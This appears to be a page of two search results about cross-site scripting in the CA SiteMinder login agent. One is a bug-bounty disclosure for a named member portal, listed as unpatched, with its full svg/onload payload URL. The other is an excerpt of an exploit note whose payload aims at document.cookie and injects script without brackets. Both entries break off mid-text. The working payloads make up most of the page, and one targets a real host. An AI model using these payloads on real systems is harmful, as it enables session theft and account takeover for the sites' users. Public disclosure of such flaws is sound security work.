2 matches found
member.ghc.org XSS vulnerability
Vulnerable URL: https://member.ghc.org/siteminderagent/forms/loginmember.fcc?postpreservationdata=%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...
siteminder-xss.txt
Exploit in XSS: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=XSS Cross Site Scripting Code: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1alertdocument.cookie;function+dropif0 In this way we can inject the alert code without brackets i...